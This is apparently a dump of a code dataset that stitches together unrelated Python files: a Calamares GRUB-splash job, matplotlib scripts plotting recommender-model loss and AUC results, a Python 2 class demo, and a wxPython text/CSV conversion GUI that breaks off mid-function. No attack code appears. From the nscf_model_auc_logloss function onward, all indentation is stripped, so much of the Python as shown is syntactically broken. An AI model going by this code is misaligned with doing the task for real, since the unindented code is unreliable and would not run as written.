    for idx, ch in enumerate(line):
        if idx % 2 == 1:
            print(ch, end="")
    print()
|
18,376 | bb8b37432293d1a9a67755ea36b4ba6446f54bdc | #!/usr/bin/env python3
# encoding: utf-8
# === This file is part of Calamares - <http://github.com/calamares> ===
#
# Calamares is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Calamares is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Calamares. If not, see <http://www.gnu.org/licenses/>.
import os
import subprocess
import libcalamares
import shutil
def run():
    """ Sabayon Calamares Hack """
    # Make sure the target's grub directory exists, then install the distro's
    # default splash image so grub picks it up as its background.
    libcalamares.utils.chroot_call(['mkdir', '-p', '/boot/grub/'])
    libcalamares.utils.chroot_call(['cp', '-f', '/usr/share/grub/default-splash.png', '/boot/grub/default-splash.png'])
    # Calamares job modules return None on success.
    return None
|
18,377 | f3be57f13b87a676c435e905aa6af0752f02714d | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['Arial']
plt.rcParams['axes.unicode_minus'] = False
def nscf_learning_curves():
    """Plot per-epoch train/test LogLoss for the NS-based CF model (hard-coded run)."""
    train_logloss = [13.9749, 12.1171, 10.8976, 7.2394, 4.3570, 3.8065, 3.7157, 3.2558, 2.9546, 2.7440, 1.5259,
                     0.9440, 0.9199, 0.8933, 0.8482, 0.7984, 0.7800, 0.7760, 0.7566, 0.7202, 0.7153, 0.7126, 0.7015, 0.6928, 0.6875, 0.6818, 0.6764, 0.6648, 0.6625, 0.6584, 0.6416, 0.6307, 0.6237, 0.6235, 0.6231, 0.6167, 0.6102, 0.6044, 0.5916, 0.5734]
    test_logloss = [15.7243, 13.5615, 11.4896, 8.4220, 5.8326, 4.6092, 4.0900, 3.7464, 3.6078, 3.4541, 2.9277, 2.1484,
                    1.6946, 1.4267, 1.3630, 1.2300, 1.1092, 0.9644, 0.9417, 0.9174, 0.8959, 0.8343, 0.8138, 0.7931,
                    0.7735, 0.7510, 0.7341, 0.7249, 0.7147, 0.6913, 0.6716, 0.6557, 0.6357, 0.6235, 0.6287, 0.6125,
                    0.6066, 0.5824, 0.6006, 0.6106]
    # x axis = epoch indices 1..N
    x = np.linspace(1, len(train_logloss), len(train_logloss))
    plt.figure(figsize=(6, 3))
    plt.grid(linestyle="--")
    ax = plt.gca()
    # hide top/right spines for a cleaner frame
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
    plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
    plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
    plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
    plt.legend(loc=0, numpoints=1)
    leg = plt.gca().get_legend()
    ltext = leg.get_texts()
    plt.setp(ltext, fontsize=6, fontweight='bold')
    plt.show()


def nscf_auc_curves():
    """Plot train/test LogLoss at sampled epochs (every 5th) for the NS-based CF model."""
    x = np.array([1, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50])
    train_logloss = np.array([13.9749, 4.3570, 2.7440, 0.8482, 0.7202, 0.6875, 0.6584, 0.6231, 0.6044, 0.5862, 0.5418])
    test_logloss = np.array([15.7243, 5.8326, 3.7541, 1.6620, 0.9174, 0.7735, 0.6913, 0.6287, 0.5824, 0.6307, 0.6744])
    plt.figure(figsize=(6, 3))
    plt.grid(linestyle="--")
    ax = plt.gca()
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
    plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
    plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
    plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
    plt.legend(loc=0, numpoints=1)
    leg = plt.gca().get_legend()
    ltext = leg.get_texts()
    plt.setp(ltext, fontsize=6, fontweight='bold')
    plt.show()
def nscf_auc_logloss():
    """Grouped bars: AUC vs LogLoss across (K, L) hyper-parameter combinations."""
    aucs = [0.6793, 0.6928, 0.7073, 0.6914, 0.7289, 0.7137, 0.6814, 0.6847, 0.6873]
    logs = [0.6245, 0.6018, 0.5947, 0.6106, 0.5824, 0.5871, 0.6239, 0.6223, 0.6152]
    x = np.arange(len(aucs))
    width = 0.35  # bar width; +/- width/2 places the two bars side by side
    plt.figure(figsize=(6, 3))
    plt.grid(linestyle="--")
    ax = plt.gca()
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
    plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
    plt.ylabel("AUC and LogLoss")
    plt.title("NS-based CF AUC and LogLoss")
    xlabels = ['K=3,L=128',
               'K=3,L=300',
               'K=3,L=500',
               'K=4,L=128',
               'K=4,L=300',
               'K=4,L=500',
               'K=5,L=128',
               'K=5,L=300',
               'K=5,L=500']
    plt.xticks(x, xlabels, fontsize=6)
    plt.ylim(0.4, 0.9)
    plt.legend()
    plt.show()


def nscf_n_auc_logloss():
    """Grouped bars: AUC vs LogLoss as the number of training samples N grows."""
    aucs = [0.6545, 0.6879, 0.6933, 0.7051, 0.7289, 0.7172, 0.7335, 0.7231, 0.7368]
    logs = [0.6429, 0.6218, 0.6073, 0.5946, 0.5824, 0.5836, 0.5817, 0.5826, 0.5819]
    x = np.arange(len(aucs))
    width = 0.35
    plt.figure(figsize=(6, 3))
    plt.grid(linestyle="--")
    ax = plt.gca()
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
    plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
    plt.ylabel("AUC and LogLoss")
    plt.title("NS-based CF AUC and LogLoss")
    xlabels = ['N=1*800167',
               'N=2*800167',
               'N=3*800167',
               'N=4*800167',
               'N=5*800167',
               'N=6*800167',
               'N=7*800167',
               'N=8*800167',
               'N=9*800167']
    plt.xticks(x, xlabels, fontsize=6)
    plt.ylim(0.4, 0.9)
    plt.legend()
    plt.show()
def nscf_rmse():
    """Line plot comparing per-epoch RMSE of six CF models (hard-coded runs)."""
    epochs = [1, 5, 15, 20, 25, 30, 35, 40, 45, 50]
    funksvd_rmses = [1.1462, 1.0471, 0.9826, 0.9445, 0.9326, 0.9218, 0.9102, 0.9017, 0.9014, 0.9013]
    svd_rmses = [1.1227, 1.0328, 0.9681, 0.9228, 0.9183, 0.8974, 0.8827, 0.8824, 0.8820, 0.8819]
    random_nscf_rmses = [1.0236, 1.0130, 0.9425, 0.8944, 0.8743, 0.8728, 0.8794, 0.8771, 0.8767, 0.8757]
    lda_nscf_rmses = [1.0038, 0.9811, 0.9314, 0.8874, 0.8681, 0.8630, 0.8657, 0.8602, 0.8690, 0.8625]
    item2vec_nscf_rmses = [1.0015, 0.9838, 0.9228, 0.8833, 0.8633, 0.8612, 0.8611, 0.8584, 0.8547, 0.8555]
    lfm_nscf_rmses = [0.9017, 0.8936, 0.8765, 0.8691, 0.8516, 0.8488, 0.8444, 0.8430, 0.8459, 0.8465]
    plt.figure(figsize=(6, 3))
    plt.grid(linestyle="--")
    ax = plt.gca()
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    # one series per model, distinguished by marker + color
    plt.plot(epochs, funksvd_rmses, marker='o', color="SkyBlue", label="FunkSVD RMSE", linewidth=1.5)
    plt.plot(epochs, svd_rmses, marker='^', color="IndianRed", label="SVD++ RMSE", linewidth=1.5)
    plt.plot(epochs, random_nscf_rmses, marker='*', color="olive", label="Random NS-based CF RMSE", linewidth=1.5)
    plt.plot(epochs, lda_nscf_rmses, marker='s', color="darkcyan", label="LDA NS-based CF RMSE", linewidth=1.5)
    plt.plot(epochs, item2vec_nscf_rmses, marker='+', color="lightslategray", label="Item2Vec Ns-based CF RMSE", linewidth=1.5)
    plt.plot(epochs, lfm_nscf_rmses, marker="d", color="darkmagenta", label="LFM NS-based CF RMSE", linewidth=1.5)
    plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
    plt.ylabel("RMSE", fontsize=6.5, fontweight='bold', labelpad=0)
    plt.legend(loc=0, numpoints=1)
    leg = plt.gca().get_legend()
    ltext = leg.get_texts()
    plt.setp(ltext, fontsize=6, fontweight='bold')
    plt.show()
def nscf_model_auc_logloss():
aucs = [0.7073, 0.7143, 0.7289, 0.7317, 0.7304, 0.7378]
logs = [0.6092, 0.5931, 0.5824, 0.5752, 0.5701, 0.5685]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based CF AUC and LogLoss")
xlabels = ['FunkSVD',
'SVD++',
'Random NS-based CF',
'LDA NS based CF',
'Item2Vec NS-based CF',
'LFM NS-based CF',]
plt.xticks(x, xlabels, fontsize=5)
plt.ylim(0.4, 0.9)
plt.legend()
plt.show()
def nscf_d_auc_logloss():
aucs = [0.7207, 0.7289, 0.7324]
logs = [0.5938, 0.5824, 0.5751]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based CF AUC and LogLoss")
xlabels = ['ml-100k',
'ml-1m',
'ml-10m']
plt.xticks(x, xlabels, fontsize=8)
plt.ylim(0.4, 0.9)
plt.legend()
plt.show()
def nssd_logloss():
x = [1, 5, 10, 15, 20, 25, 30]
train_logloss = [1.53343, 0.58776, 0.02551, 0.02154, 0.01791, 0.01343, 0.01025]
test_logloss = [1.56235, 0.59634, 0.02593, 0.03697, 0.04703, 0.05191, 0.05879]
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=5)
plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
plt.ylim(0.01, 0.6)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nssd_m_aud_logloss():
aucs = [0.7981, 0.8132, 0.8246]
logs = [0.4596, 0.4531, 0.4504]
x = np.arange(len(aucs))
width = 0.35
plt.figure(figsize=(6, 3))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.bar(x - width / 2, aucs, width, color='SkyBlue', label='AUC')
plt.bar(x + width / 2, logs, width, color='IndianRed', label='LogLoss')
plt.ylabel("AUC and LogLoss")
plt.title("NS-based Shallow&Deep AUC and LogLoss")
xlabels = ['Wide&Deep',
'DeepFM',
'NS-based Shallow&Deep']
plt.xticks(x, xlabels, fontsize=8)
plt.ylim(0.4, 1.1)
plt.legend()
plt.show()
def plot_mae():
plt.rcParams['font.sans-serif'] = ['SimHei']
plt.rcParams['axes.unicode_minus'] = False
users = [10, 20, 30, 40, 50]
# old_maes = [0.96, 0.92, 0.87, 0.85, 0.84]
# new_maes = [0.90, 0.85, 0.82, 0.815, 0.817]
old_maes = [0.89, 0.86, 0.81, 0.795, 0.785]
new_maes = [0.82, 0.79, 0.77, 0.755, 0.757]
plt.figure(figsize=(7, 4))
plt.grid(linestyle="--")
ax = plt.gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.plot(users, old_maes, marker='o', color="SkyBlue", label=u"传统相似用户模型", linewidth=1.5)
plt.plot(users, new_maes, marker='^', color="IndianRed", label=u"本文相似用户模型", linewidth=1.5)
plt.xlabel(u"相似近邻数", fontsize=10, fontweight='bold', labelpad=1)
plt.ylabel("MAE", fontsize=10, fontweight='bold', labelpad=1)
plt.ylim(0.7, 1)
plt.xlim(8, 52)
plt.legend(loc=0, numpoints=1)
leg = plt.gca().get_legend()
ltext = leg.get_texts()
plt.setp(ltext, fontsize=6, fontweight='bold')
plt.show()
def nscf_epoch_curve():
x = np.linspace(1, 100, 100)
train_logloss = [13.9749, ]
test_logloss = [15.7243, ]
# plt.figure(figsize=(6, 3))
# plt.grid(linestyle="--")
# ax = plt.gca()
# ax.spines['top'].set_visible(False)
# ax.spines['right'].set_visible(False)
#
# plt.plot(x, train_logloss, marker='o', color="SkyBlue", label="Train Data LogLoss", linewidth=1.5)
# plt.plot(x, test_logloss, marker='^', color="IndianRed", label="Test Data LogLoss", linewidth=1.5)
#
# plt.xlabel("Epochs", fontsize=6.5, fontweight='bold', labelpad=-5)
# plt.ylabel("LogLoss", fontsize=6.5, fontweight='bold', labelpad=-5)
#
# plt.legend(loc=0, numpoints=1)
# leg = plt.gca().get_legend()
# ltext = leg.get_texts()
# plt.setp(ltext, fontsize=6, fontweight='bold')
#
# plt.show()
def main():
# nscf_learning_curves()
# nscf_auc_logloss()
# nscf_n_auc_logloss()
# nscf_rmse()
# nscf_model_auc_logloss()
# nscf_d_auc_logloss()
# nssd_logloss()
# nssd_m_aud_logloss()
# plot_mae()
# nscf_epoch_curve()
nscf_learning_curves()
if __name__ == "__main__":
main()
# import random
# for i in range(20):
# print random.randint(0, 9), random.randint(0, 9)
|
18,378 | 3cdded67166462a2c922eaa644b3eca5b965321d | class MyClass(object):
class_var = 1
common_var = 10
def __init__(self, i_var, *args, **kwargs):
self.i_var = i_var
if len(args) > 0:
print 'args: ', args.__getitem__(len(args)-1)
if (kwargs.get('common_var') != None):
self.common_var = kwargs.get('common_var')
foo = MyClass(2, 120)
bar = MyClass(3, common_var = 112)
print foo.class_var, foo.i_var
print bar.class_var, bar.i_var
print MyClass.class_var
print MyClass.__dict__
try:
print foo.__class__.__dict__['common_var']
except KeyError:
print '-'
print foo.__dict__
#print foo.__dict__.__getattribute__('__doc__')
print foo.common_var
print bar.common_var
print '&&&'
print foo.common_var
setattr(MyClass, 'common_var', 500)
print foo.common_var
print '\n', MyClass.class_var
o = MyClass(100)
o.__class__.class_var
print o.class_var, MyClass.class_var
class BasePoint:
'''
# Instance object's attributes:
point = (0, 0)
'''
def __init__(self, point):
self.point = point
def distance_to_origin(self):
print 'Basepoint empty distance...', self.point
class CartezianPoint(BasePoint):
def distance_to_origin(self):
print 'Evaluate distance of cartezian point...', self.point
# here evaluate distance for cortezian and return it
class ManhettenPoint(BasePoint):
def distance_to_origin(self):
print 'Evaluate distance of manhatten point...', self.point
# evaluate of mathetten'sand return it
cp = (3, 4)
mp = (10, 20)
cp_object = CartezianPoint(cp)
mp_object = ManhettenPoint(mp)
print cp_object, mp_object
cp_object.distance_to_origin()
mp_object.distance_to_origin()
class NewtonPoint(ManhettenPoint):
pass
np_object = NewtonPoint((100, 200));
np_object.distance_to_origin()
print '\n======================\n'
class Service():
data = []
def __init__(self, other_data):
self.other_data = other_data
def __str__(self):
return 'Service instance: {}'.format(self.other_data)
s1 = Service(['a', 'b'])
s2 = Service(['c', 'd'])
s1.data = [1]
s2.data = [2]
print Service.data
print s1.data
print s2.data
|
18,379 | 68fd68601a8d643002a08284f6734ad81b0d2765 | import wx
import os #needed to join paths in open/save
import threading
import copy #deep copy for filter
class mainwindow(wx.Frame):
def __init__(self, parent, title):
self.input = ['', '', '', '', '', ''] #Save user entered values
self.dirname = ''
self.filename = ''
#Creating the window, setting it blue, and adding a text box to it
wx.Frame.__init__(self, parent, title = title, size =(1000, 800))
self.SetBackgroundColour((150, 200, 255)) #light blue
self.logger = wx.TextCtrl(self, size=(300, 150),style=wx.TE_MULTILINE|\
wx.TE_RICH)
self.CreateStatusBar()
self.Bind(wx.EVT_CLOSE, self.OnExit) #bind x button
self.is_header = False #Input has header if True
self.copy_header = False #copy header to output
self.is_csv = False #Input is csv file
self.want_csv = False #output should be csv file
self.smart_check = False #control type of output based on input
#Setting up the "File" menu option
filemenu = wx.Menu()
menuOpen = filemenu.Append(wx.ID_OPEN, "&Open", \
"Open a Text File of Points to Interpolate")
menuSave = filemenu.Append(wx.ID_SAVE, \
"&Save", "Select a Text File for Output")
menuAbout = filemenu.Append(wx.ID_ABOUT, "&About", \
"Information About the Program")
filemenu.AppendSeparator()
menuExit = filemenu.Append(wx.ID_EXIT,"&Exit","Terminate the Program")
self.Bind(wx.EVT_MENU, self.OnOpen, menuOpen)
self.Bind(wx.EVT_MENU, self.OnSave, menuSave)
self.Bind(wx.EVT_MENU, self.OnAbout, menuAbout)
self.Bind(wx.EVT_MENU, self.OnExit, menuExit)
#Setting up the "Help" menu option
helpmenu = wx.Menu()
self.menuHelp = helpmenu.Append(wx.ID_HELP, "&Help", \
"Help on Using the Program")
self.Bind(wx.EVT_MENU, self.OnHelp, self.menuHelp)
#Creating File MenuBar
menubar = wx.MenuBar()
menubar.Append(filemenu, "&File")
menubar.Append(helpmenu, "&Help")
self.SetMenuBar(menubar)
#Create Sizers
mainSizer = wx.BoxSizer(wx.VERTICAL)
grid = wx.GridBagSizer(hgap=7, vgap=3)
hSizer = wx.BoxSizer(wx.HORIZONTAL)
#Input File Box
self.input_text = wx.StaticText(self, label = "Input File Name:")
self.input_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.input_text, pos = (0, 0))
grid.Add(self.input_box, pos = (1, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 0), \
self.input_box)
self.make_bold(self.input_text)
self.make_bold(self.input_box)
#Input Browse Button
self.browse_button_input = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnOpen, self.browse_button_input)
self.make_bold(self.browse_button_input)
grid.Add(self.browse_button_input, pos = (2, 0))
#Output File Box
self.output_text = wx.StaticText(self, label = "Output File Name:")
self.output_box = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.output_text, pos = (0, 1))
grid.Add(self.output_box, pos = (1, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 1), \
self.output_box)
self.make_bold(self.output_text)
self.make_bold(self.output_box)
#Browse Button Output
self.browse_button_out = wx.Button(self, label = "Browse..")
self.Bind(wx.EVT_BUTTON, self.OnSave, self.browse_button_out)
self.make_bold(self.browse_button_out)
grid.Add(self.browse_button_out, pos = (2, 1))
#Number of Lines
self.num_lines_prompt = wx.StaticText(\
self,label="Number of lines: ")
self.num_lines = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.num_lines_prompt, pos = (3, 0))
grid.Add(self.num_lines, pos = (4, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 4), self.num_lines)
self.make_bold(self.num_lines)
self.make_bold(self.num_lines_prompt)
#Filter
self.filter_prompt = wx.StaticText(\
self,label="Filter: ")
self.filter = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.filter_prompt, pos = (3, 1))
grid.Add(self.filter, pos = (4, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 5), self.filter)
self.make_bold(self.filter_prompt)
self.make_bold(self.filter)
#Input format
self.in_format_prompt = wx.StaticText(self,label="Input File Format: ")
self.in_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.in_format_prompt, pos = (5, 0))
grid.Add(self.in_format, pos = (6, 0))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 2), self.in_format)
self.make_bold(self.in_format_prompt)
#Output Format
self.out_format_prompt= wx.StaticText(self,label="Output File Format: ")
self.out_format = wx.TextCtrl(self, value="", \
size = (200, -1))
grid.Add(self.out_format_prompt, pos = (5, 1))
grid.Add(self.out_format, pos = (6, 1))
self.Bind(wx.EVT_TEXT, lambda x: self.EvtText(x, 3), self.out_format)
self.make_bold(self.out_format_prompt)
#Has Header Checkbox
self.header_check = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Has Header")
grid.Add(self.header_check, pos = (7, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckHead, self.header_check)
self.header_check_lbl = wx.StaticText(self, label =\
(" "\
+ " Has Header"))
grid.Add(self.header_check_lbl, pos=(7, 0))
self.make_bold(self.header_check_lbl)
#Copy Header Checkbox
self.header_copy = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Copy Header")
grid.Add(self.header_copy, pos = (8, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCopy, self.header_copy)
self.header_copy_lbl = wx.StaticText(self, label =\
(" " +\
" Copy Header"))
grid.Add(self.header_copy_lbl, pos=(8, 0))
self.make_bold(self.header_copy_lbl)
self.header_copy.Enable(False)
#Input is CSV Checkbox
self.in_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Input File CSV")
grid.Add(self.in_is_csv, pos = (9, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckCSV, self.in_is_csv)
self.in_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Input is CSV File"))
grid.Add(self.in_is_csv_lbl, pos=(9, 0))
self.make_bold(self.in_is_csv_lbl)
#Output is CSV Checkbox
self.out_is_csv = wx.CheckBox(self, style=wx.CHK_2STATE, \
name = "Output File CSV")
grid.Add(self.out_is_csv, pos = (10, 1))
self.Bind(wx.EVT_CHECKBOX, self.OnCheckOut, self.out_is_csv)
self.out_is_csv_lbl = wx.StaticText(self, label =\
(" " +\
" Output is CSV File"))
grid.Add(self.out_is_csv_lbl, pos=(10, 0))
self.make_bold(self.out_is_csv_lbl)
if self.smart_check:
self.out_is_csv.Enable(False)
#Smart Checkbox
create_smartcheck = filemenu.Append(wx.ID_ANY, "Smart&Check", "SmartCheck", wx.ITEM_CHECK)
self.Bind(wx.EVT_MENU, self.OnSmartCheck, create_smartcheck)
#Convert Button
self.convert_button = wx.Button(self, label="Convert")
self.Bind(wx.EVT_BUTTON, self.OnClick, self.convert_button)
self.make_bold(self.convert_button)
#Clear Button
self.clear_button = wx.Button(self, label = "Clear")
self.Bind(wx.EVT_BUTTON, self.Clear, self.clear_button)
self.make_bold(self.clear_button)
#Setup sizers and place them
hSizer.AddSpacer(10)
hSizer.Add(grid, 0, wx.EXPAND, 10)
hSizer.AddSpacer(10)
hSizer.Add(self.logger, 1, wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(hSizer, 1,wx.EXPAND)
mainSizer.AddSpacer(10)
mainSizer.Add(self.convert_button, 0, wx.EXPAND | wx.CENTER)
mainSizer.AddSpacer(5)
buttonSizer = wx.BoxSizer(wx.HORIZONTAL)
buttonSizer.Add(self.clear_button, 1, wx.LEFT)
mainSizer.Add(buttonSizer, 0)
self.SetSizerAndFit(mainSizer)
self.Centre()
def OnAbout(self, e): #Basic info about software
'''Displays a pupup box that gives information about this software'''
dlg = wx.MessageDialog(self, "Convert Text File Software " + \
"\n\nThis Graphical-" +\
"User-Interface for converting between " +\
"Space separated and comma separated text files"\
+ " was created by" +\
" Cameron Buttazzoni for research " + \
"purposes at the Fires Management " +\
"System Laboratory in the Faculty of Forestry"+\
" at the University of Toronto\n\n" +\
"THIS SOFTWARE IS NOT VALIDATED OR CERTIFIED" +\
" FOR OPERATIONAL USE"\
+ "\nCopyright: Cameron Buttazzoni\n\n", \
"About Convert Text Files Software", wx.OK)
dlg.ShowModal()
dlg.Destroy()
def OnExit(self, e): #exit
'''Exit the software'''
self.Close(True)
raise SystemExit
def OnSave(self, e): #Same functionality as browse output file
'''Select an output file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[1] = os.path.join(self.dirname, self.filename)
self.output_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnOpen(self, e): #same functionality as browse input file
'''Open an input file'''
dlg = wx.FileDialog(self, "Choose a file", self.dirname, \
"", "*.*", wx.OPEN)
if dlg.ShowModal() == wx.ID_OK:
self.filename = dlg.GetFilename()
self.dirname = dlg.GetDirectory()
self.input[0] = os.path.join(self.dirname, self.filename)
self.input_box.SetValue(os.path.join(self.dirname, self.filename))
dlg.Destroy()
def OnHelp(self, e): #brief tutorial on commands + how to use
'''Opens a box displaying this on help'''
help_text = '''Input file should be a space seperated or csv file\n
For input format, leave it blank to copy all of the values from the input file\n
Instead, you can enter comma or space seperated numbers to choose from specific
input columns that you want to include.\nFor output format, the format is
the same, but this chooses the order the inputs will be placed in the output
file. Leave this field blank to copy all inputs.\n Numbers not entered will
be replaced by NULL for space seperated output files, and an empty string
for CVS output files.\n WARNING: Reordering the output DOES NOT reorder the
header if you select to copy it.\nSmartCheck Automatically converts to a
space seperated file if the input is CSV, and vice versa.\n
Number of lines copies up to that many lines (not counting the header if copied
\nTo use filter, enter the values as column number (starting from 1)::string\n
* can be included so to filter such that everything else must be in any string.
-- can be included at the start of a string to copy all but those ones.
% Can be included in a string to represent any character (even none)\n
Separate additional filters with a comma without a space, example:\n
4::196*,3::--Type1,1::1%%%
This would filter everything such that the 4th column must include 196
somewhere. the 3rd column cannot be Type1 and the 1st column must be a number
in the one thousands.'''
help_dlg = wx.MessageDialog(self, help_text, "File Conversion" +\
" Software Help", wx.OK)
help_dlg.ShowModal()
help_dlg.Destroy()
def EvtText(self, e, num):
'''Entering text sets input to new entered value'''
try:
value = e.GetString().encode('ascii', 'ignore')
except AttributeError:
pass
if num == 2: #input format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except (ValueError, IndexError):
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 3: #output format
if value == '':
self.input[num] = ''
elif len(value.split(',')) != 1:
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
else:
temp_list = value.split()
for x in range(len(temp_list)):
try:
if temp_list[x] != '' and temp_list[x] != ' ':
temp_list[x] = int(temp_list[x])
except ValueError:
self.logger.AppendText("\nInvalid Format\n")
self.input[num] = temp_list
elif num == 5: #Filter
temp_list = value.split(',')
for x in range(len(temp_list)):
try:
temp_list[x] = temp_list[x].split('::')
temp_list[x][0] = int(temp_list[x][0])
if type(temp_list[x][1]) != str:
raise ValueError
except (ValueError, IndexError, TypeError):
pass
self.input[5] = temp_list
else:
self.input[num] = value
def Clear(self, e): #clears logger and all entered values
self.logger.Clear()
self.input_box.Clear()
self.output_box.Clear()
self.out_format.Clear()
self.in_format.Clear()
self.filter.Clear()
self.num_lines.Clear()
for x in range(len(self.input)):
self.input[x] = ''
def OnClick(self, e):
'''Convert'''
self.disable_buttons()
if self.input[2] == '': #Copy everything
copy_all_thread = threading.Thread(target = self.copy_all)
copy_all_thread.setDaemon(True)
copy_all_thread.start()
else: #Copy some
copy_select_thread = threading.Thread(target = self.copy_select)
copy_select_thread.setDaemon(True)
copy_select_thread.start()
def copy_all(self):
#Copy Everything Over
try:
in_file = open(self.input[0], 'r')
except IOError:
self.logger.AppendText("\nInvalid Input File\n\n")
self.enable_buttons()
return
try:
out_file = open(self.input[1], 'w')
except IOError:
self.logger.AppendText("\nInvalid Output File\n\n")
self.enable_buttons()
return
temp = ''
if self.is_header:
temp = in_file.readline()
temp = in_file.readline()
if self.is_csv:
find_length_in = len(temp.split(','))
else:
find_length_in = len(temp.split())
try:
if max(self.input[2]) > find_length_in:
in_file.close()
out_file.close()
self.logger.AppendText("\nInput Format Value Too Large\n\n")
self.enable_buttons()
return
except ValueError:
pass
in_file.seek(0)
self.logger.AppendText("\nConverting...\n\n")
if self.is_header: #Copy header
temp = in_file.readline()
if temp[-1] == '\n':
temp = temp[:-1]
if self.copy_header:
if self.is_csv:
temp2 = temp.split(',')
for x in range(len(temp2)):
if not self.want_csv:
if temp2[x] != '':
if x != len(temp2) - 1:
out_file.write(temp2[x] + " ")
else:
out_file.write(temp2[x])
else:
if x != len(temp2) - 1:
out_file.write("NULL ")
else:
out_file.write("NULL")
else:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
out_file.write('\n')
else:
temp2 = temp.split()
for x in range(len(temp2)):
if self.want_csv:
if x != len(temp2) - 1:
out_file.write(temp2[x] + ",")
else:
out_file.write(temp2[x])
else:
